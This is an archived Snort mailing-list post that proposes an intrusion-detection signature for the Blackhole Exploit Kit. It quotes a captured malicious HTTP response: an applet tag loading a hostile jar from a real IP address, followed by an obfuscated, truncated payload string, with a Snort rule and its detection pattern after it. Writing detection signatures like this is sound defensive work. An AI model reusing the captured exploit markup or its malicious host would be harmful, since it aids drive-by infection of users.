Snort mailing list archives

Proposed Signature - COMMUNITY SPECIFIC-THREATS Blackhole Exploit Kit JavaScript carat string splitting with hostile applet

From: Community Proposed <lists () packetmail net>
Date: Tue, 21 Feb 2012 13:16:17 -0600

12:08:49.734573 IP 65.75.137.95.80 > a.b.c.d.3586: . 1:1461(1460) ack 567 win
6792
HTTP/1.1 200 OK
Date: Tue, 21 Feb 2012 19:30:23 GMT
Server: nginx/0.7.65
Content-Type: text/html
X-Powered-By: PHP/5.3.2
Connection: close
Transfer-Encoding: chunked

4ef
<html><body><applet code='Photo.class'
archive='http://65.75.137.95/content/jav.jar&apos;><param
value="&#118;ssMlgg=9Po9Pd%oP/9gOFU6gYPMvM-Vcd=G6cr" name="p"/></applet><div
style="display:none;"><p>@wpg9p@^p^@pg^p@9pgwp^4p4p^^p^2pg3p^4p@9p-2p-3pzwp@^p@9pgwp^4p@9p^2p20pzwpg2p^p20p3wpggp@9p@@p^3p@9p-z0p^^p@@pg3p^4p-z0p^0p@@pgzp@9p-z0pg3p^3p-z0pggpg9p@@p@wpg3pgwpgzp4p4p4pzwp@pg2p^p20pzwp@p@^p@9pgwp^4p@9p^2p20pzwpg2p^2p20p-3p-zpz^pg0p^@pgwp@^p^4pg3pg9pgwp-z0p@9pgwp@wp@3p^2p@9p@wpg3p^2p@9p@^p^4p-2p-zpwzpw3p^gp@@p^2p-z0p^0p@wpg0p^gp@9p^2pz9p49pgp2pgp2pgp2pgp@zp2pg0pggp@@p^3pg2p^gp@9p^2pz9p49pgp2pgp2pgp2pgp@zpz^p^4p^2p^9pwzp^gp@@p^2p-z0p3wpggp^@pgzpg3pgwp2gp@9p^4p@9p@^p^4pz9pwzp^gp@9p^2p^3pg3pg9pgwpzgp-wpgp4pz3p4pz2p-wp2pgwp@@pg^p@9pzgp-wp3wpggp^@pgzpg3pgwp2gp@9p^4p@9p@^p^4p-wp2pg2p@@pgwp@wpggp@9p^2pzgpg0p^@pgwp@^p^4pg3pg9pgwp-2p@^p2p@gp2p@@p-zpwzp^2p@9p^4p^@p^2pgwp-z0pg0p^@pgwp@^p^4pg3pg9pgwp-2p-zpwzp@^p-2p@gp2p@@p-zpw3pw3p2pg3p^3p2gp@9pg0pg3pgwp@9p@wpzgpg0p^@pgwp@^p^4pg3pg9pgwp-2p@gp-zpwzp^2p@9p^4p^@p^2pgwp-z0p^4p^9p^0p@9pg9pg0p-z0p@gp-9pz9p-wp^@pgwp@wp@9pg0pg3pgwp@9p@wp-wpw3p2pg3p^3p23p^2p^2p@@p^9pzgpg0p^@pgwp@^p^4pg3pg9pgwp-2p@gp-zpwzp^2p@9p^4p^@p^2pgwp-2p
 @p@@p^2p^2p@@p^9p@pg3p-zp4p^4p@9p^3p^4p-2p3^p@gpg4p@9p@^p^4p4p^0p^2pg9p^4pg9p^4p^9p^0p@9p4p^4pg9
333

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"COMMUNITY
SPECIFIC-THREATS Blackhole Exploit Kit JavaScript carat string splitting with
hostile applet"; flow:established,from_server;
content:"<html><body><applet|20|"; fast_pattern; content:"|20|code=";
distance:0; content:"|20|archive="; distance:0; content:"|3a|none|3b|";
distance:0; nocase; pcre:"/([@\x2da-z0-9]*?\x5e){50,}/Oi";
classtype:trojan-activity;
reference:url,community.websense.com/blogs/securitylabs/pages/black-hole-exploit-kit.aspx;
sid:x; rev:1;)

Thanks,
Nathan


------------------------------------------------------------------------------
Keep Your Developer Skills Current with LearnDevNow!
The most comprehensive online learning library for Microsoft developers
is just $99.99! Visual Studio, SharePoint, SQL - plus HTML5, CSS3, MVC3,
Metro Style Apps, more. Free future releases when you subscribe now!
http://p.sf.net/sfu/learndevnow-d2d
_______________________________________________
Snort-sigs mailing list
Snort-sigs () lists sourceforge net
https://lists.sourceforge.net/lists/listinfo/snort-sigs
http://www.snort.org


Please visit http://blog.snort.org for the latest news about Snort!

Current thread:

Proposed Signature - COMMUNITY SPECIFIC-THREATS Blackhole Exploit Kit JavaScript carat string splitting with hostile applet Community Proposed (Feb 21)